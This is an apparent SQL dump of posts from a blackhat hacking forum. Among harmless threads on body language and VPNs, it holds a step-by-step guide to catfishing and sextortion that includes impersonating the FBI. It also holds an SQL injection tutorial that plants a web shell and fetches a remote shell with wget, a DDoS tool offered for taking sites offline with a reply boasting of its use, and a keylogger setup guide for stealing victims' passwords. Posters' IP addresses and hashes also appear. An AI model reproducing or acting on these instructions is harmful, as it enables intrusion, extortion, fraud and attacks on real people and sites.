chin or averting their gaze. These signals indicate disbelief. When someone is not convinced with what we\'re saying, their attention will wander and their eyes will stare away for an extended period.[/i]\r\n[/list]\r\n[/list]\r\n[list]\r\n[*][b]Tilting the head.[/b][list]\r\n[*][i]Tilting the head might indicate boredom, which mostly goes paired with an unfocussed gaze as well. However, a tilted head might also be the cause of a sore neck and the unfocussed eyes could easily mean that the listener has some sort of ocular problem.[/i]\r\n[/list]\r\n[/list]\r\n[list]\r\n[*][b]Excessive blinking.[/b][list]\r\n[*][i]This is a well known indicator of someone who is either withholding information or lying. Studies do show us that the absence of blinking might as well indicate someone who is lying, rather than excessive blinking.[/i]\r\n[/list]\r\n[/list]\r\n\r\n[color=#4682B4][size=medium][u][b]Body signal clusters[/b][/u][/size][/color]\r\n[i]As you may have realized by now, body language comes in clusters of signals and postures, depending on the internal emotions and mental states of a person. Recognizing a whole cluster would thus far be more reliable than trying to recognize every individual element.\r\n\r\nI\'ll give you guys a good head start to recognize these clusters.[/i]\r\n\r\n[u][b]Aggressive body language:[/b][/u] [i]A significant cluster of body movements is used to signal agression. Recognizing this one is quite useful as it is seldom a good idea to get into a fight, even for the stronger people among us.[/i]\r\n[list]\r\n[*][b]Facial signals[/b][list]\r\n[*][i]A lot of agressions is always shown in the face, from disapproving frowns and pursed lips to a full snarl. The eyes might eventually stare and hold your gaze for a long period, or they\'ll squint, preventing theirselves from seeing where we are looking.[/i]\r\n[/list]\r\n[/list]\r\n[list]\r\n[*][b]Attack signals[/b][list]\r\n[*][i]When somebody is about to attack, they mostly give some visual signs such as clenching their fists or lowering their body for an increase of speed and stability.[/i]\r\n[/list]\r\n[/list]\r\n[list]\r\n[*][b]Exposing theirselves[/b][list]\r\n[*][i]Exposing oneself to attack is also one of the purest forms of agression. They are pretty much implying that they could take a hit from you any time and still win this fight. This can include things such as looking away from you, crotch displays, turning their backs, relaxing the body, and so on..[/i]\r\n[/list]\r\n[/list]\r\n\r\n[u][b]Bored body language:[/b][/u] [i]When a person is bored, their entire body is telling you that. So, if you are trying to persuade said person, don\'t even bother.[/i]\r\n[list]\r\n[*][b]Distraction[/b][list]\r\n[*][i]An obviously bored person pretty much looks everywhere but at the person talking to them. A gaze shifting towards a clock or their watch is also an obvious sign of boredom.[/i]\r\n[/list]\r\n[/list]\r\n[list]\r\n[*][b]Repetition[/b][list]\r\n[*][i]Bored people usually repeat certain actions such as tapping their shoes or drumming their fingers. When these actions escalate, they are usually trying to signal their boredom.[/i]\r\n[/list]\r\n[/list]\r\n[list]\r\n[*][b]Tiredness[/b][list]\r\n[*][i]A person who feels unable to relieve their boredom may show signs of tiredness. They would yawn and their whole body would sag as they slouch down in their seat, lean against a wall or just sag where they are standing. Their face might also display a lack of interest and appear blank.[/i]\r\n[/list]\r\n[/list]\r\n\r\n[u][b]Deceptive body language:[/b][/u] [i]When a person is trying to deceive you, there are many different signs of body language they may use.[/i]\r\n[list]\r\n[*][b]Anxiety[/b][list]\r\n[*][i]A deceptive person is typically anxious that they might be found out (unless they are psychopatic or very good at acting), so they may send signs of tension. This may include sweating, sudden movements, minor twitches of muscles (especially around the mouth and eyes), changes in voice tone and speed..\r\nMany of us do have hidden anxiety signals. These could be biting your bottom lip, patting your head or even putting your hands in your pockets. These signals are impossible to stop, since we start them very young. Do keep in mind that anxiety can be caused by many other factors other than deceptiveness.[/i]\r\n[/list]\r\n[/list]\r\n[list]\r\n[*][b]Over-control[/b][list]\r\n[*][i]In order to avoid being caught, there may be obvious signs over what we\'d call over-control. For example, attempt friendly body language, such as smiles (mouth smiles but eyes do not.), jerky movements and or clumsiness. The person might also try to keep his body still as if he doesn\'t want it to send these signals. This in itself is also an obvious signal, ofcourse.[/i]\r\n[/list]\r\n[/list]\r\n[list]\r\n[*][b]Distracted[/b][list]\r\n[*][i]A person who is trying to deceive needs to think more about what he or she is saying, so they may drift off or pause during their speech.\r\nAnxiety is mostly displayed into actions such as fidgeting or shifting their vision to an unusual places.[/i]\r\n[/list]\r\n[/list]\r\n\r\n[u][b]Evaluating body language:[/b][/u] [i]A notable cluster of body language signals occurs when someone is judging or making a decision.[/i]\r\n[list]\r\n[*][b]Hand movements[/b][list]\r\n[*][i]The classical signal of evaluation is steepled hands which are clasped together, either looking like their praying with their hands together, or with linked fingers and with only the index fingers pointing upwards. The fingers pointing upwards may also touch the lips, stroke the chin or touch another place on the face.[/i]\r\n[/list]\r\n[/list]\r\n[list]\r\n[*][b]Relaxed intensity[/b][list]\r\n[*][i]The body may well be relaxed and open, seeming to be unafraid or unaware of danger. However there is also a level of concentration, perhaps with pursed lips and an intense gaze. The chin might be resting on either of the two palms.[/i]\r\n[/list]\r\n[/list]\r\n\r\n[u][b]Open body language:[/b][/u] [i]A significant cluster of body movements are all about being open. This is sometimes misinterpreted solely as indicating being relaxed and untense.[/i]\r\n[list]\r\n[*][b]Arms wide open[/b][list]\r\n[*][i]A person\'s arms usually shouldn\'t be crossed when exposing theirselves. Their arm movements might even be synchronized with what is being said or held wide. Palms are also relaxed and usually quite expressive, for example appearing to hold something or form more detailed shapes.[/i]\r\n[/list]\r\n[/list]\r\n[list]\r\n[*][b]Removing clothes[/b][list]\r\n[*][i]Removing a jacket or unbuttoning a collar are also obvious signs of open body language.[/i]\r\n[/list]\r\n\r\n[color=#4682B4][size=medium][u][b]Individual facial signs[/b][/u][/size][/color]\r\n[img]http://i.imgur.com/8HgeG.png[/img]\r\n\r\n[color=#4682B4][size=medium][u][b]Using body language for sales[/b][/u][/size][/color]\r\n[i]Getting body language right when s3lling is a tricky business. Here are some tips to help manage your non-verbals.[/i]\r\n\r\n[list]\r\n[*][b]Open assertion[/b][list]\r\n[*][i]Stand openly, welcoming everyone, inquiring of their needs and showing readiness to listen.\r\nYour body language should be clear and relaxed, without being held in or under control. It supports speech, for example in emphasizing key points, and never contradicts it. It does not include unnecessary movement which may cause confusion or betray nervousness.[/i]\r\n[/list]\r\n[/list]\r\n[list]\r\n[*][b]Match and move[/b][list]\r\n[*][i]It would be good if you could largely start off by reflecting them back, for example by matching body language and using a similar verbal style, in order to create some sort of emotional/mental bond with them. Keep your body at the same level as theirs. Stand up to greet them and sit down at the same time without hesitating.\r\nOnce they have been bonded with you, you should be able to speak or move differently since they will now be following you.[/i]\r\n[/list]\r\n[/list]\r\n[list]\r\n[*][b]Leaning in[/b][list]\r\n[*][i]When you lean in towards the customer, you are getting closer to them. Thus, you are creating an even closer bond between the two of you. However, there is a danger that the other person might take this as an invasion on their personal body space, so taking your time is a must. \r\nLeaning in can be conspiratorial when the sales person lowers their voice, as if making this exclusive offer in a way that cannot be heard by their boss or other customers (who would of course snap it up immediately).\r\nLeaning also lowers the body and is a subtle bow, showing respect and deference, hence taking the sting out of any perception of dominance.[/i]\r\n[/list]\r\n[/list]\r\n[/list]\r\n\r\ncredits:Oldskool', '173.206.138.77', '-1378973107', '0', '0', '0', '0', '1', '1c41f042179df904fec644f85c326928', '0', '0'); INSERT INTO mybb_posts VALUES('60', '20', '57', '13', 'RE: SQL Injection Tutorial (Step-by-Step)', '0', '1', 't3h jok3r', '1340593391', 'Well-written tutorial. Nice job and thanks for posting. The red colored text is hard to read.', '41.174.59.138', '699284362', '1', '0', '0', '0', '1', '8d312e813995a4d78d745fba5fdefa39', '0', '0'); INSERT INTO mybb_posts VALUES('61', '21', '59', '16', 'RE: [GUIDE] In-depth reading of body language.', '0', '1', 't3h jok3r', '1340594129', 'Wow great tutorial. I learned a lot today. Thanks for this bro and I didn\'t get the relief in the picture.', '41.174.59.138', '699284362', '1', '0', '0', '0', '1', '0e3c0030aba629e0b81be9e1918253d2', '0', '0'); INSERT INTO mybb_posts VALUES('62', '22', '0', '14', 'Cyberghost VPN (Free/Premium)', '0', '1', 't3h jok3r', '1340594542', '[b]What is Cyberghost VPN?[/b]\r\n\r\nCyberGhost VPN is a personal VPN client and online service that lets users browse the Internet anonymously by acting as a firewall and server between your PC and your ISP. It lets you surf the Web normally while hiding your IP address and displaying a dead-end address. It\'s available in free and premium versions; the free version can only be installed on one PC and only one account can be activated on each computer, whereas the premium account offers more options and features.\r\n\r\n[b]Why use Cyberghost VPN?[/b]\r\n\r\nCyberGhost installs and sets up easily, including creating a username and password, though we had to reboot our system to finish the process. The program\'s main screen resembles many antivirus and firewall programs, with a left-hand list of the program\'s functions, a toolbar, and bar graphs indicating both free and premium traffic while logged on to the VPN. A prominent message warned us that we were not anonymous online and also displayed our current IP address. We clicked Connect to VPN, and a pop-up gave us several options: Connect to Free service, Create Premium connection, and Create Premium Connection with a specified server on a drop-down list. We could also display a list of available Premium servers. We tried both the Free and Premium services, which are similar. We quickly logged on to the CyberGhost VPN service and reopened our browser, which functioned normally, with the exception that our Google search page was now Google.de instead of Google.com, a small matter we quickly rectified. Every site we visited loaded normally.\r\n\r\n[b]Personal Opinion[/b]\r\n\r\nGood plus auto connects to different servers everytime you connect. Premium version keeps no logs and you can pick any location you want.\r\n\r\nLink: http://download.cnet.com/CyberGhost-VPN/3000-2144_4-75145993.html', '41.174.59.138', '699284362', '1', '0', '0', '0', '1', 'e99ab7cfaf432073940a0e9398c265f0', '0', '0'); INSERT INTO mybb_posts VALUES('63', '22', '62', '14', 'RE: Cyberghost VPN (Free/Premium)', '0', '5', 'Timmy', '1340594873', 'I use this VPN. It\'s a really great VPN plus I like the random servers thingy.', '41.174.59.138', '699284362', '1', '0', '0', '0', '1', '12309368b8d1492565773e2c9cd35ad2', '0', '0'); INSERT INTO mybb_posts VALUES('64', '3', '7', '19', 'RE: Official Site Rules', '0', '5', 'Timmy', '1340595160', 'Thanks for the rules but why such a big font?', '41.174.59.138', '699284362', '1', '0', '0', '0', '1', '2603c6c3790c8190ef4b2823b87dd749', '0', '0'); INSERT INTO mybb_posts VALUES('65', '15', '41', '9', 'RE: Adf.ly>Earn $$$ by clicks on links', '0', '5', 'Timmy', '1340595244', 'Thanks, I will be using your referral :D', '41.174.59.138', '699284362', '1', '0', '0', '0', '1', '07bb53bcb1f16df201d5cc88fb63f9f2', '0', '0'); INSERT INTO mybb_posts VALUES('66', '23', '0', '11', 'Can someone tell me what\'s the difference between a proxy and VPN?', '0', '5', 'Timmy', '1340595366', 'Can someone tell me the difference between both?', '41.174.59.138', '699284362', '1', '0', '0', '0', '1', '94cfe6ad60d77d6e31d06bbbddf86029', '0', '0'); INSERT INTO mybb_posts VALUES('67', '23', '66', '11', 'RE: Can someone tell me what\'s the difference between a proxy and VPN?', '0', '1', 't3h jok3r', '1340736329', 'A proxy is a online based anonymous IP changer to keep you anonymous. \n\nA VPN is pretty much the same but they have to be downloaded or setup and the best in my opinion because all proxies are lame and keep logs and not all VPNs keep logs.', '41.174.2.53', '699269685', '1', '0', '0', '0', '1', '21206bbea2547a5b3a7fbfe0d9ec7ae2', '0', '0'); INSERT INTO mybb_posts VALUES('68', '22', '62', '14', 'RE: Cyberghost VPN (Free/Premium)', '0', '2', 'Apathy', '1340764664', 'Nice review keep it up bro.', '173.206.139.81', '-1378972847', '0', '0', '0', '0', '1', '4d960d0bd9e87f43c80560e50123199b', '0', '0'); INSERT INTO mybb_posts VALUES('69', '24', '0', '12', '240 Monetizing and hacking ebooks.', '0', '2', 'Apathy', '1340764927', 'To download JUST CLICK THE IMAGE.\r\n\r\n[url=http://adfoc.us/447466576320][img]http://upload.wikimedia.org/wikipedia/commons/2/24/Adobe_PDF_Icon.svg[/img][/url]', '173.206.139.81', '-1378972847', '0', '0', '0', '0', '1', '5f5b76859f11443b63ae6a3012122522', '0', '0'); INSERT INTO mybb_posts VALUES('70', '24', '69', '12', 'RE: 240 Monetizing and hacking ebooks.', '0', '1', 't3h jok3r', '1340832554', 'What kinds of hacking ebooks? Plus what kinds of monetizing methods does this contain?', '41.174.23.131', '699275139', '1', '0', '0', '0', '1', '768c51d6281a693f5277f3192ffe2321', '0', '0'); INSERT INTO mybb_posts VALUES('71', '25', '0', '19', '[Junk]Blackhat System Scanner', '0', '5', 'Timmy', '1340833180', '[align=center][img]http://i.min.us/iCXKZHlD0g8Op.png[/img][/align]\n\n This programs purpose is to serve a portable and simple scantime virus scanner. It will scan your system for potential and actual viruses on your system. \n\nFeatures: \n[x] Scans whole system \n[x] Active Anti-Virus \n[x] Quarantine \n[x] Lists CPU Info \n[x] Restore Regedit, CMD, Run, Folder Options, UAC, Hosts File, System Restore, Task Manager. \n[x] Lists other Programs \n[x] Ignore All \n[x] Ignore just checked detections \n[x] Remove all detections \n[x] Remove just checked detections \n[x] Simple \n[x] Portable / Small\n[x] Quick (Scans are under 1 minute)\n\nDownload: http://adf.ly/A86yh', '41.174.23.131', '699275139', '1', '0', '5', '1340833203', '1', '2cdce4d2affa144f724443748af66021', '0', '1340833203'); INSERT INTO mybb_posts VALUES('72', '23', '66', '11', 'RE: Can someone tell me what\'s the difference between a proxy and VPN?', '0', '5', 'Timmy', '1340833246', 'Ok. Thanks what are some good VPNs out there?', '41.174.23.131', '699275139', '1', '0', '0', '0', '1', 'f87c69626393c0bc4e2e9f1c9c2f0315', '0', '0'); INSERT INTO mybb_posts VALUES('73', '17', '55', '8', 'RE: My Dubstep Remixs', '0', '5', 'Timmy', '1340833317', '[quote=\'Triple H\' pid=\'55\' dateline=\'1340516596\']\r\nCan you please stop using bold and x-large text? BTW what are dubstep remixes?\r\n[/quote]\r\n\r\nDubstep is a genre of electronic dance music. Its overall sound has been described as \"tightly coiled productions with overwhelming bass lines and reverberant drum patterns, clipped samples, and occasional vocals\"', '41.174.23.131', '699275139', '1', '0', '0', '0', '1', 'b0473027085b542112ebacfa5a818fb4', '0', '0'); INSERT INTO mybb_posts VALUES('74', '22', '62', '14', 'RE: Cyberghost VPN (Free/Premium)', '0', '4', 'Triple H', '1340833462', 'Thanks for the review. I will give this a try.', '41.174.23.131', '699275139', '0', '0', '0', '0', '1', 'b1bbf8c210e802cae0a065933e250e95', '0', '0'); INSERT INTO mybb_posts VALUES('75', '15', '41', '9', 'RE: Adf.ly>Earn $$$ by clicks on links', '0', '4', 'Triple H', '1340833510', 'Thanks for using my referral bro.', '41.174.23.131', '699275139', '0', '0', '0', '0', '1', 'f1f150451639c901566942ae88ce8250', '0', '0'); INSERT INTO mybb_posts VALUES('1798', '378', '1742', '7', 'RE: How is school for you?', '0', '61', 'NXK', '1347375398', 'I thought my schools proxy would have blocked this site, weoo.\r\n\r\nGot something to do in between class now', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', 'a76c7d1cbb0b02145226d9e810ee5952', '0', '0'); INSERT INTO mybb_posts VALUES('77', '21', '59', '16', 'RE: [GUIDE] In-depth reading of body language.', '0', '4', 'Triple H', '1340833672', 'Excellent tutorial. No words to describe tbh.', '41.174.23.131', '699275139', '0', '0', '0', '0', '1', '91ad2b1e13ec456a556b79853f3df99d', '0', '0'); INSERT INTO mybb_posts VALUES('78', '25', '71', '19', 'RE: Blackhat System Scanner', '0', '1', 't3h jok3r', '1340833999', 'Next time, please provide a virus scan report including a link to the virus scan. I have tested the program and it\'s SAFE!', '41.174.23.131', '699275139', '1', '0', '0', '0', '1', '2f2956b8b9869cfb6eb6963ccd0f3d1e', '0', '0'); INSERT INTO mybb_posts VALUES('79', '26', '0', '17', '[tut]How to E-Whore, Blackmail with pics and safety tips.', '0', '1', 't3h jok3r', '1341181178', '[size=large]Before reading this tutorial, please read the spoiler below.[/size]\n\n[spoiler]\nThis tutorial has NOT been leeched. This tutorial is allowed only on Hackforums, L33THacking and HMSEF, because I\'m the creator and the poster. Any other sites this tutorial is found on has been leeched. Any leeches of this tutorial are requested to be reported and the leechers personal data would be posted online.\n[/spoiler]\n\n[size=small][color=#FF0000]What is E-Whoring?[/color]\nE-Whoring is a black hat seo technique of making money online that translates into posing as a girl on the Internet.\n\n[color=#1E90FF]What/Who are \"PEDOS\"[/color]\nPedos are perverts that who you use during ewhoring to get money from.\n\n[color=#FF4500]Requirements:[/color]\npaypal accounts [1 real one(for personal use) and another one for ewhoring]\nmanycam\nmessenger to communicate on.\n\n[color=#DCDCDC]OPTIONAL:[/color]\nif you will blackmail then you will need a another email id but it must be of \nfbi.gov \n\nSo lets get started on how to ewhore.\n\n[color=#FFD700]Setting up Paypal[/color]\n\nGo to [i]paypal.com[/i] \nthen click on \"[i]sign up[/i]\"\nchange \"[i]your country[/i]\" to \"[i]canada[/i]\"\nChoose \"[i]PERSONAL[/i]\"\n\n** [color=#9400D3]Fill in the empty spaces but skip the credit card part (DONT ENTER ANYTHING) and type in any random address and any random phone number but THEY MUST EXIST SO SEARCH IT UP ON GOOGLE**[/color]\n\nTo view the steps via pics click on the spoilers below\n[spoiler]\nhttp://www.imageurlhost.com/images/sz6y5e1qc1uravubsncg.png\nhttp://www.imageurlhost.com/images/0hu46t0eycae4e2yev.png\nhttp://www.imageurlhost.com/images/xs3dfzhbasprkka30fdm.png\n[/spoiler]\n\n[color=#FF1493]Setting up Manycam[/color]\nDownload it from here.\nhttp://download.cnet.com/ManyCam-Virtual...?tag=mncol\n\nOpen it after you get done downloading it \nGo to [i]text over video[/i] and [i]uncheck[/i] the text over video option\nthen go to [i]sources[/i]>[i]movies[/i]>[i]insert the ewhore video[/i]\n\n**[color=#32CD32]Note: Go to your messenger settings and change the webcam default to manycam virtual or the other manycam option(it doesnt really matter what u pick and on some pcs the other option is different)[/color]\n\nTo view how to setup manycam in pics view the spoilers below\n\n[Spoiler] \nhttp://www.imageurlhost.com/images/zkptcfil8a4ngphrfsh.ping\nhttp://www.imageurlhost.com/images/dyd2hwztp0xt7ddax86s.png\nhttp://www.imageurlhost.com/images/qq45di0lhudfyr7y967e.png\n[/spoiler]\n\n[color=#FF0000]How to ewhore?[/color]\nRemember when your ewhoring you have to act like a girl. E.G: use alot of punctuations,if u make a error in the text correct it,flirt etc\n\nUse lines similar or these lines to get a pedo\n>looking for rich horny guys\n>im sellling VID/PICS for PRICE,pm me if ur interested <3 (i use MESSENGER and paypal) :D\n>Who wants to see me naked?\n>horny girl looking for horny guys\n\nP.S: some words girls use alot;\nmwah\nso sweeeet of you (USE 4 Es)\nthnkx hun\nawww\nlol,lmao,lmbo(laugh my booty off),rofl,roflol etc\n\nAfter you find them tell them to add you to your messenger and then flirt a little bit and then they always ask for a free preview then give him one and if u are using a video then show them the first few seconds of the video and then end the call and tell them that u have to pay to see more.Tell them to send it you to \"FAKE PAYPAL ACCOUNT @ **** [dot]com.As soon as they pay take the money and shift it to your real account.Then give them what they asked for.\n\n\n[color=#800000]Where can/do i have to Ewhore?[/color]\nYou have to ewhore in chatrooms \n\n[color=#00BFFF]Links:[/color] \nhttp://www.chat-avenue.com/adultchat.html\nhttp://www.midnightchatcity.com/sex/\nhttp://www.adultchat.net/\nhttp://www.chat-web.com/adultschat/adultschat1.html\nhttp://www.chat-spiral.com/index.php?page=home\nhttp://omegle.com/\nhttp://craigslist.org/\nhttp://www.xxxchatters.com/\nor search them up on google AKA google . com (WITHOUT SPACES) \n\nThat was how to ewhore your pedo now im going to show you how to ewhore.\n\n[color=#FFD700]Requirements:[/color]\n>A fbi.gov email id (steps showen below on how to make one)\n>Some screenshots or a short video of you ewhoring your slave.\n>small basic skills of social engineering\n\nOptional: Fake Facebook account (make it with the fake email id you made for ewhoring NOT THE FBI.GOV)\n\nHow to make a fbi.gov email id?\n1 - go to http://passport.net\n2 - select the option \" i will register with my own email account\"\n3 - create the account with the desired domain name ( something@fbi.gov in this case)\n4 - you are done, now you can use that account in MSN, but u wont have any inbox and also u cant change ur name on msn.\n\nProof of this steps working in the spoilers below:\nhttp://www.imageurlhost.com/images/ccd9daxrgh2jjj0vjfqf.png \n\nView these steps via pics view the spoilers below:\n\nhttp://www.imageurlhost.com/images/nuwu2iw8w6y2idz3s4cq.png\n\n[color=#00BFFF]How to Blackmail your pedo?[/color]\n95% of the blackmailing works if you sold a video/cam show to your pedo and there are only 20% chances if you sold pictures and if you dont know the basics of social engineering then you cant ever blackmail them..\nBefore giving them the show do a small chat and when you do then ask them some questions or use the ones posted below:\n[quote]Do you have facebook? if yes then ask them if you could add them\nWhats your email address again?\nHow old are you?\nWhats your age?\nWhich country are you living in?\nDo you have a girlfriend?\n[/quote]\n\n[b][color=#FF0000]PRINTSCREEN ALL THE QUESTIONS YOU ASKED AND THE ANSWER THEY GIVE.[/color][/b]\n\nThen before they log off tell them that you have printscreened THE PEDO or recorded THE PEDO watching you strip and your a underage and your real age is ANYTHING BUT UNDER 18.Tell them that you would report them to the fbi cybercrime unit if you dont pay me PRICE now.If they say they dont have any money then say \"ITS OK NO PROBLEM IT DOESNT BOTHER ME IF I GO TO THE CYBERCRIME AND REPORT YOU\" and if they ask wont you be in trouble for actually doing a show then say \"NO BECAUSE YOU ACTUALLY PAID ME REMEMBER I EVEN HAVE THE TRANSACTION REPORT AND IF YOU DISPUTE IT NO PROBLEM I EVEN HAVE A SCREENSHOT OF THAT TOO\".\n\nAs soon as they pay,shift the money to your real paypal account.\n\nIF THEY DONT PAY THEN:\nThe next day email them with the FAKE F B I.GOV EMAIL ADDRESS.\n\nTell the pedo that you made a underage person do this and that,this was illegal and the punishment is this etc and tell them to pay a fine of PRICE to the fbi.gov site and give them a link to give a link to a paypal account you own BUT DONT GIVE OUT THE EWHORING ONE OTHER WISE THEY WILL FIND OUT ITS REALLY YOU NOT THE CYBERCRIME.\n\nthen paste a copyright code similar to this.\n© copyright COMPANY NAME, 2005-2015. all rights reserved\n\n[color=#FFD700]EXTRA NOTES:[/color]\n\n[color=#DCDCDC]How to not be caught while ewhoring?\n[/color]\nUse a VPN from the start till the end (from the looking for pedo step till th e end of blackmailing/show)\n\n[color=#FF4500]Whats a VPN?[/color]\n\nIts a program that keeps your browsing anonymous.Its hard to find a free VPN but use hotspotshield because its easily plus free.\n\nDownload link:\nhttp://cyberghostvpn.com/\n\n\nThat was my tutorial about how to ewhore and blackmail your pedo with pictures for newbies including a good maybe well explained text.\n\nHere are some download links to some ewhoring packs maybe you will need them for ewhoring.\n\nPics:\nhttp://www.mediafire.com/?yxczx2831o7ac2q\nhttp://www.mediafire.com/?y5d4a43extbrio1\n\nVideos:\n\nhttp://www.filesonic.com/file/1246848724\nhttp://www.filesonic.com/file/2168987794\n\nDifferences between white hat,black hat and grey hat:\n\n[color=#000000]Blackhat:[/color] Illegal activities such as hacking into websites,cracking into accounts,social engineering etc.\n[color=#FFFFFF]Whitehat:[/color] Helping out others by hacking into stuff but doing it to stop the blackhats.\n[color=#DCDCDC]Greyhat[/color]: Grey hat is a group with white hat and black hat activities mixed.\n\nGood luck in ewhoring.[/size]', '41.151.155.217', '697801689', '1', '0', '1', '1341181301', '1', 'c80c80ee2233e0a476feaf388a3f0067', '0', '1341181301'); INSERT INTO mybb_posts VALUES('80', '27', '0', '13', '[TuT] Upload Shell Through SQL Injection', '0', '5', 'Timmy', '1341182787', 'Note that this is a pretty rare vulnerability but it is out there!\r\n\r\nSo lets start.. ( i will not show the URL in this tutorial for varous reasons.. )\r\nAnd my code is a bit strange since the vulnerable column is a picture..\r\n\r\nVulnerable column (8): \r\n[spoiler]\r\n[img]http://i.imgur.com/BSxtF.png[/img]\r\n[/spoiler]\r\n\r\nNow we need to get the user ( if you cant do this it isn\'t vulnerable )\r\n[code]\r\nunion select 1,2,3,4,5,6,7,user,9 from mysql.user--\r\n[/code]\r\n\r\n[spoiler]\r\n[img]http://i.imgur.com/AbYui.png[/img]\r\n[/spoiler]\r\n\r\nSuccess, our site is vulnerable.\r\n\r\nNow we need to check for permissions ( file_priv )\r\n[code]\r\nunion select 1,2,3,4,5,6,7,group_concat(user,0x3a,file_priv,\"
    \"),9 from mysql.user--[/code]\r\n\r\n[spoiler]\r\n[img]http://i.imgur.com/h0Ifg.png[/img]\r\n[img]http://i.imgur.com/uBN5s.png[/img]\r\n[/spoiler]\r\n\r\nOur current user has \" Y \" file privs, that means we can use this method \r\n\r\nNow lets write a file! ( we need full paths and be able to use \" in our query )\r\n\r\n[code]\r\nunion select 1,2,3,4,5,6,7,\"\",9 into outfile \"/var/www/shell.php\"--[/code]\r\n\r\n[spoiler]\r\n[img]http://i.imgur.com/Th1Ic.png[/img]\r\n[/spoiler]\r\n\r\nNow we have written our file \" shell.php \", lets use it.\r\n\r\n[code]\r\nshell.php?cmd=wget http://shellsite.org/shell.txt -O our_shell.php[/code]\r\nBig O is important!\r\n\r\n[spoiler]\r\n[img]http://i.imgur.com/YfHuS.png[/img]\r\n[/spoiler]\r\n\r\nSuccess ! we now have a fully working shell, without even getting into an admin panel\r\n\r\n[spoiler]\r\n[img]http://i.imgur.com/WCLkt.png[/img]\r\n[/spoiler]\r\n\r\nCredits: xB1N4RYx', '41.150.204.72', '697748552', '1', '0', '0', '0', '1', '20827849431b3ab426ecfa140e21e734', '0', '0'); INSERT INTO mybb_posts VALUES('81', '17', '73', '8', 'RE: My Dubstep Remixs', '0', '1', 't3h jok3r', '1341433989', '[quote=\'Timmy\' pid=\'73\' dateline=\'1340833317\']\r\n[quote=\'Triple H\' pid=\'55\' dateline=\'1340516596\']\r\nCan you please stop using bold and x-large text? BTW what are dubstep remixes?\r\n[/quote]\r\n\r\nDubstep is a genre of electronic dance music. Its overall sound has been described as \"tightly coiled productions with overwhelming bass lines and reverberant drum patterns, clipped samples, and occasional vocals\"\r\n[/quote]\r\n\r\nThat\'s right.\r\n\r\n@OP I think you have updated the songs, I like them all.', '41.174.22.238', '699274990', '1', '0', '0', '0', '1', 'a6323fe1228cdcefff60ac16715c6381', '0', '0'); INSERT INTO mybb_posts VALUES('82', '28', '0', '3', 'Buttons updated.', '0', '1', 't3h jok3r', '1341434168', 'I have updated the buttons to CSS from images. The benefits are that it saves me time and it can be translated into other languages easily. It took me around 45 minutes but I was able to work it out.\n\nIf you find any button in images and not CSS then please let me know.', '41.174.22.238', '699274990', '1', '0', '1', '1341434227', '1', '12f6dfc7263678530d7211398a522879', '0', '1341434227'); INSERT INTO mybb_posts VALUES('83', '29', '0', '15', '???Italian DoS tool (Great for hitting sites offline)???', '0', '1', 't3h jok3r', '1341434810', 'This is the best Italian DDoS created by [b]xXmanuddXx!![/b]\nIn the \'\'sito vittima\'\' you must enter the website to destroy and click start!\n\n[align=center]Tutorial HD:\n\n[video=youtube]http://www.youtube.com/watch?feature=player_embedded&v=bC_GSQAd4lA[/video]\n\n[i][b]Program Preview in English[/b][/i]\n[spoiler]\n[img]http://i50.tinypic.com/29kp352.png[/img]\n[/spoiler]\n\n\n[b]VIRUSCAN:[/b] https://www.virustotal.com/file/6e2125a3.../analysis/ \n\n[lock][b]DOWNLOAD:[/b] http://www.mediafire.com/?y5kyrsrhv468o5n[/lock]\n\n[/align]\n\nP.S: Run it as Administrator and it may not work on sandboxie.', '41.174.22.238', '699274990', '1', '0', '1', '1352012128', '1', '28b1facd956d2094603ca64f30ded0a0', '0', '1352012128'); INSERT INTO mybb_posts VALUES('84', '30', '0', '12', 'HOW TO SETUP RINLOGGER [COMPLETE AND EASY]', '0', '4', 'Triple H', '1341435898', '[color=#FF0000]Download Rin Logger. (Link at the bottom of the tutorial)\nRun the keylogger file on your computer and hit on “Create new”.[/color]\n\n[img]http://2.bp.blogspot.com/-DXZmF9vB1VM/TnXvXTIj5-I/AAAAAAAAAW4/_H0spJWyEeg/s320/1.png[/img]\n\n[color=#FF1493]Now, enter the information as follows:\nEmail address: Email address where you want to receive all hacked passwords. Use Gmail address (recommended).\nAccount Password: Password of your Email address.\nKeylogger Recepients: Enter your Email and hit On Add.[/color]\n\nHit on Next. Now, enter the time duration between two emails. If you set it to 5 minutes, you will receive emails after every 5 minutes. Hit on Next. \n\n[img]http://2.bp.blogspot.com/-SH4Hl_g16iE/TnXwR2m5XtI/AAAAAAAAAW8/CGD9NgxQ7iQ/s320/2.png[/img]\n\n[color=#00BFFF]Now, change Install keylogger to “Enabled”. Name the file anything you want and select Installation path as “Startup”.[/color]\n\n[img]http://2.bp.blogspot.com/-vJT0Dq7nHHc/TnXxKDPbdkI/AAAAAAAAAXA/E8NcC-8RylU/s320/3.png[/img]\n\n[color=#32CD32]There are many more features in this key logger like Download Setup, Dialog Setup, Website Viewer, File Binder, MoZilla Firefox, Administrator Task etc.\nNow Set File Properties. \nNow, hit on “Save As” and select the path where you want to save your keyloggerserver file. Click on “Compile”.[/color]\n\n[img]http://2.bp.blogspot.com/--B8uj87RpXQ/TnX1EOo3R5I/AAAAAAAAAXE/Zw0pcbv00ng/s320/3.png[/img]\n\n[color=#FF4500]Done, This kelogger is very popular.[/color]\n\n[color=#FFD700]Other Features\nMelt File\nDownloader\nWeb-Viewer\nFlexible fake Message\nAttach screenshots for each logging session\nMultiple log recipients[/color]\n\n[b]Download:[/b] http://www.mediafire.com/?95kxo3zqiatzzel\n\nThe servers might get detected because this keylogger is popular and SAFE. This download has been approved by an Admin. A keylogger is a program that creates a server which your victim downloads and runs on their monitor then we receive all their keystrokes and more including passwords.\n\n\nCredits: criticallygeek.in/2012/02/how-to-setup-rinlogger-complete-and.html', '41.174.22.238', '699274990', '0', '0', '1', '1346078014', '1', '395ae7241469637050085f69d86c0da2', '0', '1346078014'); INSERT INTO mybb_posts VALUES('85', '29', '83', '15', 'RE: ???Italian DDoS tool (Great for hitting sites offline)???', '0', '4', 'Triple H', '1341435945', 'Thanks, I used it today to knock down a gaming website. Thanks a lot for the DDoSer', '41.174.22.238', '699274990', '0', '0', '0', '0', '1', '213f16f38f056baf0979a45fd81d2f27', '0', '0'); INSERT INTO mybb_posts VALUES('86', '31', '0', '7', 'How long are you online daily?', '0', '4', 'Triple H', '1341436045', 'How many hours do you spend on your computer?', '41.174.22.238', '699274990', '0', '0', '0', '0', '1', '8e28e4ba9dd748e08416019242673ab5', '0', '0'); INSERT INTO mybb_posts VALUES('87', '32', '0', '16', '[tut]How to SE 